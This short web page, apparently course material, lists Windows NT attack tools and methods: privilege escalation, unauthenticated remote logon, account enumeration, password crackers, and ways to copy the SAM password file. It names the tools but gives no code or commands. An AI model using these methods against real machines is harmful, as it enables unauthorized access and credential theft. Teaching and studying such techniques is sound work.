NT Exploits
- GetAdmin - tool that is used to escalate privileges on an NT system
- CheckAdmin - see who is a member of the Administrator group in your LAN
- Red Button - remotely logs onto target machine without authentication using NetBIOS ports 137, 138, and 139
- Winfo - remotely retrieve a list of user accounts, workstation trust accounts, interdomain trust accounts, server trust accounts, and shares
- Passwords
- L0phtcrack - free version uses dictionary; brute force version requires payment
- NTSweep - free version; tries changing passwords over the network
- NTCrack
- PWDump
- Advanced NT Security Explorer
- Obtaining passwords
- Sniffing the passwords off the network - Ethereal - free network protocol analyzer
- Booting into another OS (e.g. Linux or DOS) and copying the SAM file NTFSDOS or LINNT
- Using LINNT to obtain administrator access (Only works on a pre-sp3 computer WITHOUT syskey installed)
- Obtaining a copy of the SAM file from c:\winnt\repair or a backup directory
- Obtaining a copy from a tape or emergency repair disk
- Scan ports - NetBrute Scanner; also scans for open shares
Please mail any comments about this page to wsummers@cs.nmhu.edu